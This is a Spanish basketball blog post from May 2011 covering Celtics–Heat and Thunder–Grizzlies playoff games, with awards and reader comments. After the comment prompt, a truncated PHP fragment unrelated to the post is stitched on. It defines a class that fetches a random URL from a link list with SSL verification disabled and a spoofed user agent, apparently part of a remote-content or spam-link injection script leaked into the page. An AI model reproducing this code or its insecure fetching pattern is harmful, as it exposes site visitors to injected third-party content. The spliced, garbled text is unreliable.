Playoffs (09/05/2011): Instantes a vida o muerte

10 de May de 2011 por TheDeerHunter

El balón en las manos. El tiempo se consume. Miles de miradas atentas al desenlace. Unos pocos segundos para resolverse todo. La temporada o la carrera de uno. No existe nada más allá que el instante porque quizás no haya otra oportunidad nunca. Lo que separa al hombre del niño, al oro del centeno. Lo que etiqueta al grande como looser. ¿Tiembla el pulso o no tiembla? Tal épica y belleza sólo puede verse en playoffs. Lo demás sólo puede ser una aproximación lejana.

En una jornada antológica pudimos disfrutar anoche de un buen puñado de esos momentos. Instantes en los que cuesta hasta respirar por la tensión. 4 prórrogas en dos partidos y situaciones críticas de todos los colores y olores. ¡I love this game!

Los Celtics tuvieron la suya. Última posesión en las manos de Pierce para ganar tras una pérdida garrafal de LeBron en la enésima mala jugada de clutch que desaprovecha esta campaña. No suele fallarlas “The Truth”. Pudo agrandar su leyenda con su jugada más típica. Pasito atrás, tiro bombeado en el último segundo y casi podemos oir el sonido de la red antes de que ocurra. Sí logro LeBron estorbar lo suficiente y el lanzamiento fue malo. Error que puede costar una eliminatoria.
Rivers planteó un choque “a las barricadas” porque los “Beach boys” se imponían individualmente. Bosh superó el miedo escénico y se comió a Garnett, Wade lo lleva haciendo con Allen toda la eliminatoria. La batalla no debería siquiera haber llegado derimido en el Pierce vs LeBron pero es lo que tienen los verdes. Duros hasta en partidos malos. A punto estuvo de salirles bien. El duelo de aleros fue increíble. La increíblemente inoportuna pérdida de LeBron bien podría haberle colocado en el patíbulo, pero su actuación fue memorable. Pudo compensarla con una buena defensa y capacidad de decisión en la prórroga. Hoy tiene el anillo muchísimo más cerca (98-90).

Lo bueno, sin embargo, vino después. Tres prórrogas en el Oklahoma@Memphis. Va camino de convertirse en una serie al nivel de la Bulls-Celtics de hace dos años.

Sólo una noche después de que Randolph batiera el récord reboteador de la franquicia lo iguala Marc. Inmenso el hermano de los Gasol. Un tapón suyo a Westbrook permitió a Conley forzar la primera prórroga. Remontaron en el cuarto periodo tras haber sido remontados en el tercero. Una montaña rusa de infarto.

Se repitieron muchas de las constantes de la eliminatoria. Zach&Marc se impusieron por dentro, esta vez con una producción discreta de un Ibaka tocado, y Durant&Westbrook se impusieron por fuera. Escandalosa actuación de estos cuatro monstruos.

La balanza se inclinó por detalles. Vasquez&Mayo superaron la producción de Harden, pero la floja producción de Conley, Tony Allen o Young no sacó provecho de su teórica ventaja sobre Ibaka (mermado), Perkins y Sefolosha. 2-2 y que no se acabe esta serie (133-123).

PREMIOS

MVP: El Big Three de Miami fue, nuevamente, demasiado para Boston. Chris Bosh, 20 puntos, 12 rebotes, Dwyane Wade, 28 puntos y 9 rebotes, y Lebron James, 35 puntos y 14 rebotes. Demasiada tralla. En Memphis, la pareja Westbrook-Durant se fue a los 75 puntos aprovechando las 3 prórrogas de las que disfrutaron.

Sorpresa: Greivis Vazquez está siendo más protagonista en este final de temporada. Anoche gozó de 27 minutos en los que anotó 14 puntos.

Decepción: El de ayer no fue de los mejores días de Kevin Garnett. 1 de 10 en tiros para 7 míseros puntos. Rajon Rondo también estuvo muy por debajo de su nivel habitual.

Esfuerzo en vano: La pareja Randolph-Gasol estuvo a la altura a pesar de la derrota, sobretodo el español que en los 57 minutos que estuvo en pista se fue a los 26 puntos y 21 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Dios mío que partidazos… Ahora mismo estoy pagando el haberlos visto pero merece la pena (y eso que ganaron los 2 equipos que no querIa).

    Los Heat muy serios pero ahora es cuando va a empezar lo que se decía a principio de temporada: si ganan es porque estaban obligados y no tiene tanto mérito. Lebron ha tenido que unirse a Wade y bosh para batir a los Celtics. Si ganan el anillo no se le va a dar el valor que tiene, yo el primero.

    Los oseznos sencillamente brutales. Sé que han perdido pero están haciendo unos playoffs memorables. MARC-ILLE O’NEAL? Llevaba 14 puntos en el primer cuarto! Que todos los partidos sigan así

    Where amazing happens

      Citar

  2. TheDeerHunter dice:
    #2

    En el caso que ganen el anillo, que está por ver, será un error muy grande no reconocerlo.
    Creo que está demostrado que ganar con tres tíos, aunque sean esos tres tíos, tiene un mérito muy grande. Y ganar allí en el templo verde… ya pueden ser tres superhombres o 14. Es muy grande… y estuvieron a punto de volver a comprobar lo difícil que siempre es.

    Si llega a meter ese tiro Pierce… ¿qué estaríamos diciendo?

      Citar

  3. GreenPride dice:
    #3

    ¡¡¡Vivan los playoffs!!!! Partidazos de infarto, jugadas al límite, equipos que escapan del hollo y se vuelven a meter en él unos segundos después, lucha a muerte bajo los aros, baloncesto en estado puro.
    Para empezar los Heat tomaron el Garden en un partido que los Celtics lucharon a de nuevo a muerte pero que con Rondo muy tocado y Garnett y Allen anulados al final no pudieron ganar. Sólo su lucha y un enorme Paul Pierce no fueron suficientes pero casi ya que Pierce tuvo la última bola para ganar pero Allen y Garnett se hicieron un lío sobre quien iba a bloquear y al final su tiro forzado no entró. En la prórroga los verdes no parecieron quedarles ya piernas para más y no jugaron ni un ataque en condiciones, muy tocados por no haber podido rematar. Esta vez Garnett no pudo con los Heat que le dieron duro en cada corte para coger posición y Wade y LeBron mataron en el ataque de los de Miami. El orgullo verde está a salvo tras estos 2 partidos a muerte en Boston, pero con medio equipo de camino al hospital tras cada partido parece imposible que puedan ganar en Miami y volver a Boston para el 6º aunque seguro que lo intentarán todo.
    Después otro espectáculo aún mayor en Memphis. Los Grizzlies empezaron dominando claramenta hasta por 18 puntos con Marc&Zach haciendo lo que les daba la gana por dentro. Sin embargo los Thunder demostraron carácter y fueron remontando y en el tercero ya estaban por delante. De ahí al final fue un partido a muerte de los que hacen historia con 3 prorrogas y alternativas constantes. Los Grizzlies tuvieron cierta suerte con 2 triples salvadores en 2 de los finales de partido para provocar otra prorroga pero al final Durant y Westbrook pudieron decidir. La serie vuelve ahora a Oklahoma para un 5º partido interesantísimo donde veremos si los Grizzlies son duros mentalmente tras el palo de perder de esta manera el 4º.

      Citar

  4. ralage dice:
    #4

    Pues realmente si que se les complican los Playoffs a los Celtics, la verdad los 2 equipos jugaron fatal la prórroga pero la diferencia es que en los Heat,aparecieron sus estrellas para meter canastas de puro talento

      Citar

  5. Javijaen dice:
    #5

    Además, si hoy ganaron los Heat con este arbitraje casero típico de PO, no me imagino a Celtics ganando dos en Miami con estas circunstancias. Creo que será demasiado para el Big Three, con Garnett y Allen algo cansados (o solo me lo parece a mi?). Como era de esperar, el partido de Bosh no fue tan malo como el anterior. Pese a todo, aguantaron los verdes. Si tuvieran 5 años menos Kevin-Ray-Shaquille arrasarían…

      Citar

  6. Jabho dice:
    #6

    🙁

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>